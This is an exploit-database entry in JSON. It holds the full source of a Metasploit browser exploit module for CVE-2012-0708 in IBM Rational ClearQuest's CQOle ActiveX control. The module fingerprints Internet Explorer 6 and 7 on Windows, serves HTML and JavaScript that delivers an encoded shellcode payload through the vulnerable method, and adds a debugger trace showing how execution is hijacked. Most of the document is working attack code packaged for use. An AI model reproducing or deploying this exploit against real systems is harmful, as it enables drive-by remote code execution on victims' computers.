Description
Exploit for the Windows platform, in the category of remote exploits
{"id": "1337DAY-ID-18917", "type": "zdt", "bulletinFamily": "exploit", "title": "IBM Rational ClearQuest CQOle Remote Code Execution", "description": "Exploit for windows platform in category remote exploits", "published": "2012-07-04T00:00:00", "modified": "2012-07-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/18917", "reporter": "rgod", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-14T13:53:56", "viewCount": 7, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2012-0708"]}]}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/18917", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"7.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :classid => \"{94773112-72E8-11D0-A42E-00A024DED613}\",\r\n :method => \"RegisterSchemaRepoFromFileByDbSet\",\r\n :rank => NormalRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"IBM Rational ClearQuest CQOle Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a function prototype mismatch on the CQOle ActiveX\r\n control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which\r\n allows reliable remote code execution when DEP isn't enabled.\r\n },\r\n 'License' 
=> MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Andrea Micalizzi aka rgod', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-0708' ],\r\n [ 'BID', '53170' ],\r\n [ 'OSVDB', '81443'],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-113/' ],\r\n [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21591705' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # cqole.dll 7.1100.0.150\r\n [ 'Automatic', {} ],\r\n [ 'IE 6 / IE7 (No DEP)', {} ], # Because of the nature of the vulnerability no DEP is a requisite\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 19 2012\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/\r\n return targets[1] #IE 6 on Windows XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/\r\n return targets[1] #IE 7 on Windows XP\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7/\r\n return targets[1] #IE 7 on Windows Vista\r\n else\r\n return nil\r\n end\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n my_target = get_target(agent)\r\n\r\n # Avoid the attack if the victim doesn't have the same setup we're targeting\r\n if my_target.nil?\r\n print_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n js_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(my_target.arch))\r\n object_id = rand_text_alpha(rand(8) + 4)\r\n dbset_value = rand_text_alpha(rand(8) + 4)\r\n var_payload = rand_text_alpha(rand(8) + 4)\r\n\r\n html = <<-EOS\r\n <html>\r\n 
<body>\r\n <object id='#{object_id}' classid='clsid:94773112-72E8-11D0-A42E-00A024DED613'></object>\r\n <script language=\"JavaScript\">\r\n var #{var_payload} = unescape(\"#{js_code}\")\r\n #{object_id}.RegisterSchemaRepoFromFileByDbSet(\"#{dbset_value}\", #{var_payload});\r\n </script>\r\n </body>\r\n </html>\r\n EOS\r\n\r\n html = html.gsub(/^\\t\\t/, '')\r\n\r\n print_status(\"#{cli.peerhost}:#{cli.peerport} - Sending html\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n\r\n end\r\n\r\nend\r\n\r\n=begin\r\n\r\n* RegisterSchemaRepoFromFile and no RegisterSchemaRepoFromFileByDbSet is called:\r\n\r\nBreakpoint 0 hit\r\neax=3190b1a0 ebx=00000000 ecx=03015cf0 edx=7835f5d2 esi=0013e200 edi=0000000c\r\neip=78371062 esp=0013e204 ebp=0013e2b4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\r\nMFC80U!_AfxDispatchCall+0xe:\r\n78371062 ffd0 call eax {cqole!OAdSession::RegisterSchemaRepoFromFile (3190b1a0)}\r\n\r\n* RegisterSchemaRepoFromFile prototype (it is going to be executed):\r\n\r\n.text:31865E40 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFile(wchar_t const *)\r\n\r\nhis ret is: retn 4\r\n\r\n* RegisterSchemaRepoFromFileByDbSet prototype (it should be executed):\r\n\r\n.text:31866280 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFileByDbSet(wchar_t const *, wchar_t const *)\r\n\r\nhis ret is: retn 8\r\n\r\n* When RegisterSchemaRepoFromFile returns to MFC80U!_AfxDispatchCall it is what happens:\r\n\r\n0:000> p\r\neax=00186864 ebx=00000000 ecx=442d618d edx=00070001 esi=0013e200 edi=0000000c\r\neip=78371064 esp=0013e208 ebp=0013e2b4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\r\nMFC80U!_AfxDispatchCall+0x10:\r\n78371064 c3 ret\r\n0:000> dd esp\r\n0013e208 001dcff4 7835f5d2 fffffffe 78336a3a\r\n\r\nESP is pointing to the second argument of RegisterSchemaRepoFromFileByDbSet and no to the stored EIP 
on\r\nthe stack. The ret from MFC80U!_AfxDispatchCall allows to get control on a reliable way when DEP is\r\ndisabled\r\n\r\n=end\r\n\r\n\n\n# 0day.today [2018-04-14] #", "_state": {"dependencies": 1647589307, "score": 1659703426, "epss": 1678812679}}
{}